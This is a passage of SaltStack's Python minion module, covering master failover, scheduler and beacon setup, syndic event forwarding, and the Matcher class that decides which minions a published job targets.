# delete the scheduled job so it doesn't interfere with the failover process
if self.opts['transport'] != 'tcp':
self.schedule.delete_job(name=master_event(type='alive'))
log.info('Trying to tune in to next master from master-list')
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'auth'):
self.pub_channel.auth.invalidate()
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
# if eval_master finds a new master for us, self.connected
# will be True again on successful master authentication
try:
master, self.pub_channel = yield self.eval_master(
opts=self.opts,
failed=True,
failback=tag.startswith(master_event(type='failback')))
except SaltClientError:
pass
if self.connected:
self.opts['master'] = master
# re-init the subsystems to work with the new master
log.info(
'Re-initialising subsystems for new master %s',
self.opts['master']
)
# put the current schedule into the new loaders
self.opts['schedule'] = self.schedule.option('schedule')
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
# make the schedule to use the new 'functions' loader
self.schedule.functions = self.functions
self.pub_channel.on_recv(self._handle_payload)
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# update scheduled job to run with the new master addr
if self.opts['transport'] != 'tcp':
schedule = {
'function': 'status.master',
'seconds': master_alive_interval,
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
schedule=schedule)
if self.opts['master_failback'] and 'master_list' in self.opts:
if self.opts['master'] != self.opts['master_list'][0]:
schedule = {
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master_list'][0]}
}
self.schedule.modify_job(name=master_event(type='failback'),
schedule=schedule)
else:
self.schedule.delete_job(name=master_event(type='failback'), persist=True)
else:
self.restart = True
self.io_loop.stop()
elif tag.startswith(master_event(type='connected')):
# Handle this event only once, otherwise it will pollute the log.
# Also, if master_type is failover, all the reconnection work is done
# by the `disconnected` event handler and this event should never happen;
# check it anyway, just to be sure.
if not self.connected and self.opts['master_type'] != 'failover':
log.info('Connection to master %s re-established', self.opts['master'])
self.connected = True
# modify the __master_alive job to only fire,
# if the connection is lost again
if self.opts['transport'] != 'tcp':
if self.opts['master_alive_interval'] > 0:
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
schedule=schedule)
else:
self.schedule.delete_job(name=master_event(type='alive', master=self.opts['master']), persist=True)
elif tag.startswith('__schedule_return'):
# reporting current connection with master
if data['schedule'].startswith(master_event(type='alive', master='')):
if data['return']:
log.debug(
'Connected to master %s',
data['schedule'].split(master_event(type='alive', master=''))[1]
)
self._return_pub(data, ret_cmd='_return', sync=False)
elif tag.startswith('_salt_error'):
if self.connected:
log.debug('Forwarding salt error event tag=%s', tag)
self._fire_master(data, tag)
elif tag.startswith('salt/auth/creds'):
key = tuple(data['key'])
log.debug(
'Updating auth data for %s: %s -> %s',
key, salt.crypt.AsyncAuth.creds_map.get(key), data['creds']
)
salt.crypt.AsyncAuth.creds_map[tuple(data['key'])] = data['creds']
def _fallback_cleanups(self):
'''
Fallback cleanup routines, attempting to fix leaked processes, threads, etc.
'''
# Add an extra fallback in case a forked process leaks through
multiprocessing.active_children()
# Cleanup Windows threads
if not salt.utils.platform.is_windows():
return
for thread in self.win_proc:
if not thread.is_alive():
thread.join()
try:
self.win_proc.remove(thread)
del thread
except (ValueError, NameError):
pass
def _setup_core(self):
'''
Set up the core minion attributes.
This is safe to call multiple times.
'''
if not self.ready:
# First call. Initialize.
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.user.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
self.grains_cache = self.opts['grains']
self.ready = True
def setup_beacons(self, before_connect=False):
'''
Set up the beacons.
This is safe to call multiple times.
'''
self._setup_core()
loop_interval = self.opts['loop_interval']
new_periodic_callbacks = {}
if 'beacons' not in self.periodic_callbacks:
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
def handle_beacons():
# Process Beacons
beacons = None
try:
beacons = self.process_beacons(self.functions)
except Exception:
log.critical('The beacon errored: ', exc_info=True)
if beacons and self.connected:
self._fire_master(events=beacons)
new_periodic_callbacks['beacons'] = tornado.ioloop.PeriodicCallback(
handle_beacons, loop_interval * 1000)
if before_connect:
# Make sure there is a chance for one iteration to occur before connect
handle_beacons()
if 'cleanup' not in self.periodic_callbacks:
new_periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback(
self._fallback_cleanups, loop_interval * 1000)
# start all the other callbacks
for periodic_cb in six.itervalues(new_periodic_callbacks):
periodic_cb.start()
self.periodic_callbacks.update(new_periodic_callbacks)
def setup_scheduler(self, before_connect=False):
'''
Set up the scheduler.
This is safe to call multiple times.
'''
self._setup_core()
loop_interval = self.opts['loop_interval']
new_periodic_callbacks = {}
if 'schedule' not in self.periodic_callbacks:
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
if not hasattr(self, 'schedule'):
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners,
utils=self.utils,
cleanup=[master_event(type='alive')])
try:
if self.opts['grains_refresh_every']: # If exists and is not zero. In minutes, not seconds!
if self.opts['grains_refresh_every'] > 1:
log.debug(
'Enabling the grains refresher. Will run every {0} minutes.'.format(
self.opts['grains_refresh_every'])
)
else: # Clean up minute vs. minutes in log message
log.debug(
'Enabling the grains refresher. Will run every {0} minute.'.format(
self.opts['grains_refresh_every'])
)
self._refresh_grains_watcher(
abs(self.opts['grains_refresh_every'])
)
except Exception as exc:
log.error(
'Exception occurred in attempt to initialize grain refresh routine during minion tune-in: {0}'.format(
exc)
)
# TODO: actually listen to the return and change period
def handle_schedule():
self.process_schedule(self, loop_interval)
new_periodic_callbacks['schedule'] = tornado.ioloop.PeriodicCallback(handle_schedule, 1000)
if before_connect:
# Make sure there is a chance for one iteration to occur before connect
handle_schedule()
if 'cleanup' not in self.periodic_callbacks:
new_periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback(
self._fallback_cleanups, loop_interval * 1000)
# start all the other callbacks
for periodic_cb in six.itervalues(new_periodic_callbacks):
periodic_cb.start()
self.periodic_callbacks.update(new_periodic_callbacks)
# Main Minion Tune In
def tune_in(self, start=True):
'''
Lock onto the publisher. This is the main event loop for the minion
:rtype : None
'''
self._pre_tune()
log.debug('Minion \'%s\' trying to tune in', self.opts['id'])
if start:
if self.opts.get('beacons_before_connect', False):
self.setup_beacons(before_connect=True)
if self.opts.get('scheduler_before_connect', False):
self.setup_scheduler(before_connect=True)
self.sync_connect_master()
if self.connected:
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
# Make sure to gracefully handle CTRL_LOGOFF_EVENT
if HAS_WIN_FUNCTIONS:
salt.utils.win_functions.enable_ctrl_logoff_handler()
# On first startup execute a state run if configured to do so
self._state_run()
self.setup_beacons()
self.setup_scheduler()
# schedule the stuff that runs every interval
ping_interval = self.opts.get('ping_interval', 0) * 60
if ping_interval > 0 and self.connected:
def ping_master():
try:
def ping_timeout_handler(*_):
if self.opts.get('auth_safemode', False):
log.error('** Master Ping failed. Attempting to restart minion**')
delay = self.opts.get('random_reauth_delay', 5)
log.info('delaying random_reauth_delay %ss', delay)
# regular sys.exit raises an exception -- which isn't sufficient in a thread
os._exit(salt.defaults.exitcodes.SALT_KEEPALIVE)
self._fire_master('ping', 'minion_ping', sync=False, timeout_handler=ping_timeout_handler)
except Exception:
log.warning('Attempt to ping master failed.', exc_info_on_loglevel=logging.DEBUG)
self.periodic_callbacks['ping'] = tornado.ioloop.PeriodicCallback(ping_master, ping_interval * 1000)
self.periodic_callbacks['ping'].start()
# add handler to subscriber
if hasattr(self, 'pub_channel') and self.pub_channel is not None:
self.pub_channel.on_recv(self._handle_payload)
elif self.opts.get('master_type') != 'disable':
log.error('No connection to master found. Scheduled jobs will not run.')
if start:
try:
self.io_loop.start()
if self.restart:
self.destroy()
except (KeyboardInterrupt, RuntimeError): # A RuntimeError can be re-raised by Tornado on shutdown
self.destroy()
def _handle_payload(self, payload):
if payload is not None and payload['enc'] == 'aes':
if self._target_load(payload['load']):
self._handle_decoded_payload(payload['load'])
elif self.opts['zmq_filtering']:
# In the filtering enabled case, we'd like to know when the minion sees something it shouldn't
log.trace(
'Broadcast message received not for this minion, Load: %s',
payload['load']
)
# If it's not AES, and thus has not been verified, we do nothing.
# In the future, we could add support for some clearfuncs, but
# the minion currently has no need.
def _target_load(self, load):
# Verify that the publication is valid
if 'tgt' not in load or 'jid' not in load or 'fun' not in load \
or 'arg' not in load:
return False
# Verify that the publication applies to this minion
# It's important to note that the master does some pre-processing
# to determine which minions to send a request to. So for example,
# a "salt -G 'grain_key:grain_val' test.ping" will invoke some
# pre-processing on the master and this minion should not see the
# publication if the master does not determine that it should.
if 'tgt_type' in load:
match_func = getattr(self.matcher,
'{0}_match'.format(load['tgt_type']), None)
if match_func is None:
return False
if load['tgt_type'] in ('grain', 'grain_pcre', 'pillar'):
delimiter = load.get('delimiter', DEFAULT_TARGET_DELIM)
if not match_func(load['tgt'], delimiter=delimiter):
return False
elif not match_func(load['tgt']):
return False
else:
if not self.matcher.glob_match(load['tgt']):
return False
return True
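# Illustrative sketch (not part of the original module): the shape of a
# publication load that _target_load() accepts; all field values here are
# hypothetical.
#
#   load = {'tgt': 'web*',
#           'tgt_type': 'glob',
#           'jid': '20190101120000123456',
#           'fun': 'test.ping',
#           'arg': []}
#   minion._target_load(load)  # True only if this minion's id matches 'web*'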
def destroy(self):
'''
Tear down the minion
'''
self._running = False
if hasattr(self, 'schedule'):
del self.schedule
if hasattr(self, 'pub_channel') and self.pub_channel is not None:
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
if hasattr(self, 'periodic_callbacks'):
for cb in six.itervalues(self.periodic_callbacks):
cb.stop()
def __del__(self):
self.destroy()
class Syndic(Minion):
'''
Make a Syndic minion, this minion will use the minion keys on the
master to authenticate with a higher level master.
'''
def __init__(self, opts, **kwargs):
self._syndic_interface = opts.get('interface')
self._syndic = True
# force auth_safemode to True because the Syndic doesn't support autorestart
opts['auth_safemode'] = True
opts['loop_interval'] = 1
super(Syndic, self).__init__(opts, **kwargs)
self.mminion = salt.minion.MasterMinion(opts)
self.jid_forward_cache = set()
self.jids = {}
self.raw_events = []
self.pub_future = None
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
# TODO: even do this??
data['to'] = int(data.get('to', self.opts['timeout'])) - 1
# Only forward the command if it didn't originate from ourselves
if data.get('master_id', 0) != self.opts.get('master_id', 1):
self.syndic_cmd(data)
def syndic_cmd(self, data):
'''
Take the now clear load and forward it on to the client cmd
'''
# Set up default tgt_type
if 'tgt_type' not in data:
data['tgt_type'] = 'glob'
kwargs = {}
# optionally add a few fields to the publish data
for field in ('master_id', # which master the job came from
'user', # which user ran the job
):
if field in data:
kwargs[field] = data[field]
def timeout_handler(*args):
log.warning('Unable to forward pub data: %s', args[1])
return True
with tornado.stack_context.ExceptionStackContext(timeout_handler):
self.local.pub_async(data['tgt'],
data['fun'],
data['arg'],
data['tgt_type'],
data['ret'],
data['jid'],
data['to'],
io_loop=self.io_loop,
callback=lambda _: None,
**kwargs)
def fire_master_syndic_start(self):
# Send an event to the master that the minion is live
if self.opts['enable_legacy_startup_events']:
# old style event. Defaults to false in Neon Salt release.
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'syndic_start',
sync=False,
)
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'syndic'),
sync=False,
)
# TODO: clean up docs
def tune_in_no_block(self):
'''
Executes the tune_in sequence but omits extra logging and the
management of the event bus assuming that these are handled outside
the tune_in sequence
'''
# Instantiate the local client
self.local = salt.client.get_local_client(
self.opts['_minion_conf_file'], io_loop=self.io_loop)
# add handler to subscriber
self.pub_channel.on_recv(self._process_cmd_socket)
def _process_cmd_socket(self, payload):
if payload is not None and payload['enc'] == 'aes':
log.trace('Handling payload')
self._handle_decoded_payload(payload['load'])
# If it's not AES, and thus has not been verified, we do nothing.
# In the future, we could add support for some clearfuncs, but
# the syndic currently has no need.
@tornado.gen.coroutine
def reconnect(self):
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
# if eval_master finds a new master for us, self.connected
# will be True again on successful master authentication
master, self.pub_channel = yield self.eval_master(opts=self.opts)
if self.connected:
self.opts['master'] = master
self.pub_channel.on_recv(self._process_cmd_socket)
log.info('Minion is ready to receive requests!')
raise tornado.gen.Return(self)
def destroy(self):
'''
Tear down the syndic minion
'''
# We borrowed the local client's poller, so give it back before
# it's destroyed. Reset the local poller reference.
super(Syndic, self).destroy()
if hasattr(self, 'local'):
del self.local
if hasattr(self, 'forward_events'):
self.forward_events.stop()
# TODO: need a way of knowing if the syndic connection is busted
class SyndicManager(MinionBase):
'''
Make a MultiMaster syndic minion, this minion will handle relaying jobs and returns from
all minions connected to it to the list of masters it is connected to.
Modes (controlled by `syndic_mode`):
sync: This mode will synchronize all events and publishes from higher level masters
cluster: This mode will only sync job publishes and returns
Note: jobs will be returned best-effort to the requesting master. This also means
(since we are using zmq) that if a job was fired and the master disconnects
between the publish and return, that the return will end up in a zmq buffer
in this Syndic headed to that original master.
In addition, since these classes all seem to use a mix of blocking and non-blocking
calls (with varying timeouts along the way), this daemon does not handle failure well:
it will (under most circumstances) stall for ~15s trying to forward events
to the down master
'''
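# Illustrative note (not from this module): the mode and failover strategy are
# only read from opts here, so they would typically be set in the syndic's
# master config file. The values shown below are assumptions.
#
#   syndic_mode: cluster        # default is 'sync' (forward all events)
#   syndic_failover: ordered    # anything other than 'random' keeps config order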
# time to connect to upstream master
SYNDIC_CONNECT_TIMEOUT = 5
SYNDIC_EVENT_TIMEOUT = 5
def __init__(self, opts, io_loop=None):
opts['loop_interval'] = 1
super(SyndicManager, self).__init__(opts)
self.mminion = salt.minion.MasterMinion(opts)
# sync (old behavior), cluster (only returns and publishes)
self.syndic_mode = self.opts.get('syndic_mode', 'sync')
self.syndic_failover = self.opts.get('syndic_failover', 'random')
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
self._has_master = threading.Event()
self.jid_forward_cache = set()
if io_loop is None:
install_zmq()
self.io_loop = ZMQDefaultLoop.current()
else:
self.io_loop = io_loop
# List of events
self.raw_events = []
# Dict of rets: {master_id: {event_tag: job_ret, ...}, ...}
self.job_rets = {}
# List of delayed job_rets which could not be sent for some reason and will be resent to
# any available master
self.delayed = []
# Active pub futures: {master_id: (future, [job_ret, ...]), ...}
self.pub_futures = {}
def _spawn_syndics(self):
'''
Spawn all the coroutines which will sign in the syndics
'''
self._syndics = OrderedDict() # mapping of opts['master'] -> syndic
masters = self.opts['master']
if not isinstance(masters, list):
masters = [masters]
for master in masters:
s_opts = copy.copy(self.opts)
s_opts['master'] = master
self._syndics[master] = self._connect_syndic(s_opts)
@tornado.gen.coroutine
def _connect_syndic(self, opts):
'''
Create a syndic, and asynchronously connect it to a master
'''
last = 0 # never have we signed in
auth_wait = opts['acceptance_wait_time']
failed = False
while True:
log.debug(
'Syndic attempting to connect to %s',
opts['master']
)
try:
syndic = Syndic(opts,
timeout=self.SYNDIC_CONNECT_TIMEOUT,
safe=False,
io_loop=self.io_loop,
)
yield syndic.connect_master(failed=failed)
# set up the syndic to handle publishes (specifically not event forwarding)
syndic.tune_in_no_block()
# Send an event to the master that the minion is live
syndic.fire_master_syndic_start()
log.info(
'Syndic successfully connected to %s',
opts['master']
)
break
except SaltClientError as exc:
failed = True
log.error(
'Error while bringing up syndic for multi-syndic. Is the '
'master at %s responding?', opts['master']
)
last = time.time()
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
yield tornado.gen.sleep(auth_wait) # TODO: log?
except KeyboardInterrupt:
raise
except: # pylint: disable=W0702
failed = True
log.critical(
'Unexpected error while connecting to %s',
opts['master'], exc_info=True
)
raise tornado.gen.Return(syndic)
def _mark_master_dead(self, master):
'''
Mark a master as dead. This will start the sign-in routine
'''
# if it's connected, mark it dead
if self._syndics[master].done():
syndic = self._syndics[master].result() # pylint: disable=no-member
self._syndics[master] = syndic.reconnect()
else:
# TODO: debug?
log.info(
'Attempting to mark %s as dead, although it is already '
'marked dead', master
)
def _call_syndic(self, func, args=(), kwargs=None, master_id=None):
'''
Wrapper to call a given func on a syndic, best effort to get the one you asked for
'''
if kwargs is None:
kwargs = {}
successful = False
# Call for each master
for master, syndic_future in self.iter_master_options(master_id):
if not syndic_future.done() or syndic_future.exception():
log.error(
'Unable to call %s on %s, that syndic is not connected',
func, master
)
continue
try:
getattr(syndic_future.result(), func)(*args, **kwargs)
successful = True
except SaltClientError:
log.error(
'Unable to call %s on %s, trying another...',
func, master
)
self._mark_master_dead(master)
if not successful:
log.critical('Unable to call %s on any masters!', func)
def _return_pub_syndic(self, values, master_id=None):
'''
Wrapper to call '_return_pub_multi' on a syndic, best effort to get the one you asked for
'''
func = '_return_pub_multi'
for master, syndic_future in self.iter_master_options(master_id):
if not syndic_future.done() or syndic_future.exception():
log.error(
'Unable to call %s on %s, that syndic is not connected',
func, master
)
continue
future, data = self.pub_futures.get(master, (None, None))
if future is not None:
if not future.done():
if master == master_id:
# Targeted master's previous send is not done yet, call again later
return False
else:
# Fallback master is busy, try the next one
continue
elif future.exception():
# Previous execution on this master returned an error
log.error(
'Unable to call %s on %s, trying another...',
func, master
)
self._mark_master_dead(master)
del self.pub_futures[master]
# Add not sent data to the delayed list and try the next master
self.delayed.extend(data)
continue
future = getattr(syndic_future.result(), func)(values,
'_syndic_return',
timeout=self._return_retry_timer(),
sync=False)
self.pub_futures[master] = (future, values)
return True
# Loop done and didn't exit: wasn't sent, try again later
return False
def iter_master_options(self, master_id=None):
'''
Iterate (in order) over your options for master
'''
masters = list(self._syndics.keys())
if self.opts['syndic_failover'] == 'random':
shuffle(masters)
if master_id not in self._syndics:
master_id = masters.pop(0)
else:
masters.remove(master_id)
while True:
yield master_id, self._syndics[master_id]
if len(masters) == 0:
break
master_id = masters.pop(0)
def _reset_event_aggregation(self):
self.job_rets = {}
self.raw_events = []
def reconnect_event_bus(self, something):
future = self.local.event.set_event_handler(self._process_event)
self.io_loop.add_future(future, self.reconnect_event_bus)
# Syndic Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
self._spawn_syndics()
# Instantiate the local client
self.local = salt.client.get_local_client(
self.opts['_minion_conf_file'], io_loop=self.io_loop)
self.local.event.subscribe('')
log.debug('SyndicManager \'%s\' trying to tune in', self.opts['id'])
# register the event sub to the poller
self.job_rets = {}
self.raw_events = []
self._reset_event_aggregation()
future = self.local.event.set_event_handler(self._process_event)
self.io_loop.add_future(future, self.reconnect_event_bus)
# forward events every syndic_event_forward_timeout
self.forward_events = tornado.ioloop.PeriodicCallback(self._forward_events,
self.opts['syndic_event_forward_timeout'] * 1000,
)
self.forward_events.start()
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
self.io_loop.start()
def _process_event(self, raw):
# TODO: cleanup: Move down into event class
mtag, data = self.local.event.unpack(raw, self.local.event.serial)
log.trace('Got event %s', mtag) # pylint: disable=no-member
tag_parts = mtag.split('/')
if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
'return' in data:
if 'jid' not in data:
# Not a job return
return
if self.syndic_mode == 'cluster' and data.get('master_id', 0) == self.opts.get('master_id', 1):
log.debug('Return received with matching master_id, not forwarding')
return
master = data.get('master_id')
jdict = self.job_rets.setdefault(master, {}).setdefault(mtag, {})
if not jdict:
jdict['__fun__'] = data.get('fun')
jdict['__jid__'] = data['jid']
jdict['__load__'] = {}
fstr = '{0}.get_load'.format(self.opts['master_job_cache'])
# Only need to forward each load once. Don't hit the disk
# for every minion return!
if data['jid'] not in self.jid_forward_cache:
jdict['__load__'].update(
self.mminion.returners[fstr](data['jid'])
)
self.jid_forward_cache.add(data['jid'])
if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']:
# Pop the oldest jid from the cache
tmp = sorted(list(self.jid_forward_cache))
tmp.pop(0)
self.jid_forward_cache = set(tmp)
if master is not None:
# __'s to make sure it doesn't print out on the master cli
jdict['__master_id__'] = master
ret = {}
for key in 'return', 'retcode', 'success':
if key in data:
ret[key] = data[key]
jdict[data['id']] = ret
else:
# TODO: config to forward these? If so we'll have to keep track of who
# has seen them
# if we are the top level master, don't forward all the minion events
if self.syndic_mode == 'sync':
# Add generic event aggregation here
if 'retcode' not in data:
self.raw_events.append({'data': data, 'tag': mtag})
def _forward_events(self):
log.trace('Forwarding events') # pylint: disable=no-member
if self.raw_events:
events = self.raw_events
self.raw_events = []
self._call_syndic('_fire_master',
kwargs={'events': events,
'pretag': tagify(self.opts['id'], base='syndic'),
'timeout': self._return_retry_timer(),
'sync': False,
},
)
if self.delayed:
res = self._return_pub_syndic(self.delayed)
if res:
self.delayed = []
for master in list(six.iterkeys(self.job_rets)):
values = list(six.itervalues(self.job_rets[master]))
res = self._return_pub_syndic(values, master_id=master)
if res:
del self.job_rets[master]
class Matcher(object):
'''
Use to return the value for matching calls from the master
'''
def __init__(self, opts, functions=None):
self.opts = opts
self.functions = functions
def confirm_top(self, match, data, nodegroups=None):
'''
Takes the data passed to a top file environment and determines if the
data matches this minion
'''
matcher = 'compound'
if not data:
log.error('Received bad data when setting the match from the top '
'file')
return False
for item in data:
if isinstance(item, dict):
if 'match' in item:
matcher = item['match']
if hasattr(self, matcher + '_match'):
funcname = '{0}_match'.format(matcher)
if matcher == 'nodegroup':
return getattr(self, funcname)(match, nodegroups)
return getattr(self, funcname)(match)
else:
log.error('Attempting to match with unknown matcher: %s', matcher)
return False
def glob_match(self, tgt):
'''
Returns true if the passed glob matches the id
'''
if not isinstance(tgt, six.string_types):
return False
return fnmatch.fnmatch(self.opts['id'], tgt)
def pcre_match(self, tgt):
'''
Returns true if the passed pcre regex matches
'''
return bool(re.match(tgt, self.opts['id']))
def list_match(self, tgt):
'''
Determines if this host is on the list
'''
if isinstance(tgt, six.string_types):
tgt = tgt.split(',')
return bool(self.opts['id'] in tgt)
def grain_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the grains glob match
'''
log.debug('grains target: %s', tgt)
if delimiter not in tgt:
log.error('Got insufficient arguments for grains match '
'statement from master')
return False
return salt.utils.data.subdict_match(
self.opts['grains'], tgt, delimiter=delimiter
)
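# Illustrative sketch (not part of the original class): grain targets are
# delimiter-separated paths into the grains dict, matched as globs by
# salt.utils.data.subdict_match(). The grains below are hypothetical.
#
#   matcher = Matcher({'id': 'minion1', 'grains': {'os': 'Ubuntu', 'num_cpus': 4}})
#   matcher.grain_match('os:Ubu*')     # True
#   matcher.grain_match('os:CentOS')   # False
#   matcher.grain_match('os')          # False: no delimiter in the target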
def grain_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Matches a grain based on regex
'''
log.debug('grains pcre target: %s', tgt)
if delimiter not in tgt:
log.error('Got insufficient arguments for grains pcre match '
'statement from master')
return False
return salt.utils.data.subdict_match(
self.opts['grains'], tgt, delimiter=delimiter, regex_match=True)
def data_match(self, tgt):
'''
Match based on the local data store on the minion
'''
if self.functions is None:
utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=utils)
comps = tgt.split(':')
if len(comps) < 2:
return False
val = self.functions['data.getval'](comps[0])
if val is None:
# The value is not defined
return False
if isinstance(val, list):
# We are matching a single component to a single list member
for member in val:
if fnmatch.fnmatch(six.text_type(member).lower(), comps[1].lower()):
return True
return False
if isinstance(val, dict):
if comps[1] in val:
return True
return False
return bool(fnmatch.fnmatch(
val,
comps[1],
))
def pillar_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar glob match
'''
log.debug('pillar target: %s', tgt)
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.data.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter
)
def pillar_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar pcre match
'''
log.debug('pillar PCRE target: %s', tgt)
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar PCRE match '
'statement from master')
return False
return salt.utils.data.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter, regex_match=True
)
def pillar_exact_match(self, tgt, delimiter=':'):
'''
Reads in the pillar match, no globbing, no PCRE
'''
log.debug('pillar target: %s', tgt)
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.data.subdict_match(self.opts['pillar'],
tgt,
delimiter=delimiter,
exact_match=True)
def ipcidr_match(self, tgt):
'''
Matches based on IP address or CIDR notation
'''
try:
# Target is an address?
tgt = ipaddress.ip_address(tgt)
except: # pylint: disable=bare-except
try:
# Target is a network?
tgt = ipaddress.ip_network(tgt)
except: # pylint: disable=bare-except
log.error('Invalid IP/CIDR target: %s', tgt)
return []
proto = 'ipv{0}'.format(tgt.version)
grains = self.opts['grains']
if proto not in grains:
match = False
elif isinstance(tgt, (ipaddress.IPv4Address, ipaddress.IPv6Address)):
match = six.text_type(tgt) in grains[proto]
else:
match = salt.utils.network.in_subnet(tgt, grains[proto])
return match
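# Illustrative sketch (not part of the original class), assuming the minion's
# grains contain an 'ipv4' list as populated by the core grains:
#
#   matcher = Matcher({'id': 'minion1', 'grains': {'ipv4': ['10.0.0.5', '127.0.0.1']}})
#   matcher.ipcidr_match('10.0.0.5')     # True: exact address present in grains['ipv4']
#   matcher.ipcidr_match('10.0.0.0/24')  # True: 10.0.0.5 falls inside the subnet
#   matcher.ipcidr_match('not-an-ip')    # []: invalid target is logged and rejected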
def range_match(self, tgt):
'''
Matches based on range cluster
'''
if HAS_RANGE:
range_ = seco.range.Range(self.opts['range_server'])
try:
return self.opts['grains']['fqdn'] in range_.expand(tgt)
except seco.range.RangeException as exc:
log.debug('Range exception in compound match: %s', exc)
return False
return False
def compound_match(self, tgt):
'''
Runs the compound target check
'''
nodegroups = self.opts.get('nodegroups', {})
if not isinstance(tgt, six.string_types) and not isinstance(tgt, (list, tuple)):
log.error('Compound target received that is neither string, list nor tuple')
return False
log.debug('compound_match: %s ? %s', self.opts['id'], tgt)
ref = {'G': 'grain',
'P': 'grain_pcre',
'I': 'pillar',
'J': 'pillar_pcre',
'L': 'list',
'N': None, # Nodegroups should already be expanded
'S': 'ipcidr',
'E': 'pcre'}
if HAS_RANGE:
ref['R'] = 'range'
results = []
opers = ['and', 'or', 'not', '(', ')']
if isinstance(tgt, six.string_types):
words = tgt.split()
else:
# we make a shallow copy in order to not affect the passed in arg
words = tgt[:]
while words:
word = words.pop(0)
target_info = salt.utils.minions.parse_target(word)
# Easy check first
if word in opers:
if results:
if results[-1] == '(' and word in ('and', 'or'):
log.error('Invalid beginning operator after "(": %s', word)
return False
if word == 'not':
if not results[-1] in ('and', 'or', '('):
results.append('and')
results.append(word)
else:
# seq start with binary oper, fail
if word not in ['(', 'not']:
log.error('Invalid beginning operator: %s', word)
return False
results.append(word)
elif target_info and target_info['engine']:
if 'N' == target_info['engine']:
# if we encounter a node group, just evaluate it in-place
decomposed = salt.utils.minions.nodegroup_comp(target_info['pattern'], nodegroups)
if decomposed:
words = decomposed + words
continue
engine = ref.get(target_info['engine'])
if not engine:
# If an unknown engine is called at any time, fail out
log.error(
'Unrecognized target engine "%s" for target '
'expression "%s"', target_info['engine'], word
)
return False
engine_args = [target_info['pattern']]
engine_kwargs = {}
if target_info['delimiter']:
engine_kwargs['delimiter'] = target_info['delimiter']
results.append(
six.text_type(getattr(self, '{0}_match'.format(engine))(*engine_args, **engine_kwargs))
)
else:
# The match is not explicitly defined, evaluate it as a glob
results.append(six.text_type(self.glob_match(word)))
results = ' '.join(results)
log.debug('compound_match %s ? "%s" => "%s"', self.opts['id'], tgt, results)
try:
return eval(results) # pylint: disable=W0123
except Exception:
log.error(
'Invalid compound target: %s for results: %s', tgt, results)
return False
return False
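# Illustrative sketch (not part of the original class): a compound target mixes
# the engines from `ref` above via the letter@ prefix syntax plus and/or/not
# operators. The pattern below is hypothetical.
#
#   matcher.compound_match('web* and G@os:Debian or E@db[0-9]+')
#   # each word resolves to 'True'/'False' through the per-engine *_match
#   # methods and the resulting boolean expression is then eval()'d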
def nodegroup_match(self, tgt, nodegroups):
'''
This is a compatibility matcher and is NOT called when using
nodegroups for remote execution, but is called when the nodegroups
matcher is used in states
'''
if tgt in nodegroups:
return self.compound_match(
salt.utils.minions.nodegroup_comp(tgt, nodegroups)
)
return False
class ProxyMinionManager(MinionManager):
'''
Create the multi-minion interface but for proxy minions
'''
def _create_minion_object(self, opts, timeout, safe,
io_loop=None, loaded_base_name=None,
jid_queue=None):
'''
Helper function to return the correct type of object
'''
return ProxyMinion(opts,
timeout,
safe,
io_loop=io_loop,
loaded_base_name=loaded_base_name,
jid_queue=jid_queue)
class ProxyMinion(Minion):
'''
This class instantiates a 'proxy' minion--a minion that does not manipulate
